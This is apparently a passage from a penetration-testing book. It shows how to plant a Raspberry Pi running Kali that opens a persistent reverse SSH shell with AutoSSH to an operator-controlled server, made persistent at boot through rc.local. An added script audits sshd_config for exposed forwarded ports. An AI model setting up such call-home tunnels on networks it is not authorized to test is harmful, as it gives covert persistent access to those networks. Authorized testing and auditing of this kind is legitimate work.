For a persistent reverse SSH connection, you can use AutoSSH to set up an SSH session via a wired connection on the target network, or, if you have taken the time to set up a 3G connection over USB, it can run completely wirelessly. AutoSSH is a package that enables you to create persistent outbound SSH connections from the Raspberry Pi to a server that you control somewhere on the Internet. When the Raspberry Pi boots and has a network connection, either wired or 3G, it will automatically call home and establish a secure session to that server.
Follow this example to install and configure AutoSSH on your Kali instance. This can be used to access and carry out your attacks from a remote location.
Use the apt-get command to install the latest version of autossh from the repository:
# apt-get install autossh
To set up AutoSSH, we'll need to make configuration changes on both sides: the Raspberry Pi and the server side where you will be controlling the remote device from.
On the Raspberry Pi, the public key is found in /etc/ssh/ssh_host_rsa_key.pub. Cat this file and grab the output starting with ssh-rsa through user@host. Add this key to the authorized_hosts file in the ~/.ssh/ directory on the server. To accomplish this, switch to that directory and then add the key using the echo command.
The following two options need to be set in the sshd_config file on the server:

AllowTCPForwarding (yes): Enables TCP forwarding on the SSH daemon to facilitate the connection of the remote shell to a local port.

GatewayPorts (yes): When you use TCP forwarding, the default behavior is to only listen on the loopback address (127.0.0.1). This option enables you to directly connect to this reverse shell from off-box, say, from your laptop.
Change to /etc/ssh and locate your sshd_config file. We will be using a similar technique to add the configuration changes into this file with the echo command. After modifying the sshd_config file, you will need to restart the SSHD service:
# cd /etc/ssh
# echo "AllowTCPForwarding yes" >> sshd_config
# echo "GatewayPorts yes" >> sshd_config
# service ssh restart
You should get the following result:
Next, run the autossh command, which will build the outbound tunnel and bind it to your server in the cloud:
# autossh -M 10000 -N -f -R 1337:localhost:22 root@lambda
In this example, -M is the local port that autossh will run on, -N tells it not to execute a remote command (from SSH), -f (from SSH) tells it to run in the background, and -R is the remote port and will bind it to localhost on port 22, the default SSH port. The last parameter tells it to connect to our remote host using the root account. This information should be changed to reflect the IP or hostname where your server is running.
-M: The local port
-N: This means that you should not execute a command
-f: Runs in the background
-R: Port forwarding from
root@lambda: The defined user and IP address or hostname of the remote server
From the server, you can now SSH to localhost with the -p flag (1337 for this example) and connect to the reverse shell sent by the Raspberry Pi. This shell is more interactive than what we had with the netcat shell, since it's a full SSH tunnel. This is probably advantageous if you do this frequently with the Raspberry Pi during penetration tests.

Next, add the autossh command to the /etc/rc.local file so that every time the server boots, the session will be established. To complete this task, you will need a text editor, such as vi or nano. The rc.local file contains a line at the end of the file which must remain the last item. This prevents us from just appending to the end of the file, as shown in previous examples:
# vi /etc/rc.local
Move to the line above exit 0. Use i to insert a line. Copy and paste the autossh command you generated previously. Press Esc to exit insert mode and, finally, enter :wq to write the file and quit.

If you need some additional persistence of the tunnel, there are some additional flags you can set, such as ServerAliveInterval and ServerAliveCountMax, which will send traffic over your SSH tunnel to help ensure that it isn't dropped by a firewall between the Raspberry Pi and the remote server.
Since we enabled GatewayPorts earlier in the SSHD configuration file, you can also connect to this shell directly, SSHing to the IP address of your server followed by the port you specified. In this case, this would look like the following command:
# ssh root@lambda -p 1337
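The two sshd_config keywords set earlier decide whether a port reverse-forwarded with -R listens only on the server's loopback or on every interface the server has, which is worth auditing on any box that accepts such tunnels. The POSIX shell snippet below is an added example, not code from the book: it reads an sshd_config (a constructed sample here), resolves a keyword's effective value the way sshd does (comments skipped, case-insensitive, first occurrence wins), and reports whether -R listeners would be reachable from off-box.

```shell
#!/bin/sh
# Added audit helper (not from the book). Answers: would ports reverse-
# forwarded with "ssh -R" be reachable from other hosts? Matching follows
# sshd_config(5): keywords are case-insensitive, "#" lines are comments,
# "Keyword value" and "Keyword=value" are both accepted, and the FIRST
# occurrence of a keyword is the one sshd uses.

# Print the effective value of keyword $2 in config file $1, or default $3.
sshd_option() {
    _key=$(printf '%s' "$2" | tr '[:upper:]' '[:lower:]')
    _val=$(awk -v key="$_key" '
        { gsub(/=/, " ") }                      # Keyword=value -> Keyword value
        NF == 0 || substr($1, 1, 1) == "#" { next }
        tolower($1) == key { print $2; exit }   # first occurrence wins
    ' "$1")
    if [ -n "$_val" ]; then printf '%s\n' "$_val"; else printf '%s\n' "$3"; fi
}

# Exit 0 when -R listeners would bind on all interfaces, 1 otherwise.
# Defaults as in sshd_config(5): AllowTcpForwarding yes, GatewayPorts no.
# "clientspecified" counts as exposed: the client may then request a
# non-loopback bind address itself.
reverse_ports_exposed() {
    case $(sshd_option "$1" AllowTcpForwarding yes) in
        yes|remote) ;;           # remote (-R) forwarding permitted
        *) return 1 ;;
    esac
    case $(sshd_option "$1" GatewayPorts no) in
        yes|clientspecified) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample (not a real server's file): the two lines the book
# appends, preceded by an earlier, still-active GatewayPorts setting. The
# appended "GatewayPorts yes" does NOT override it, because sshd takes the
# first occurrence.
sample=${TMPDIR:-/tmp}/sshd_config.sample.$$
cat > "$sample" <<'EOF'
# constructed sample sshd_config
Port 22
GatewayPorts no
AllowTCPForwarding yes
GatewayPorts yes
EOF
if reverse_ports_exposed "$sample"; then
    echo "exposed: -R listeners reachable from off-box"
else
    echo "not exposed: effective GatewayPorts=$(sshd_option "$sample" GatewayPorts no)"
fi
rm -f "$sample"
```

Because sshd honours the first occurrence of a keyword, a line appended with echo >> sshd_config has no effect if the same keyword is already set, uncommented, higher in the file; running the check after the restart confirms which value actually took effect.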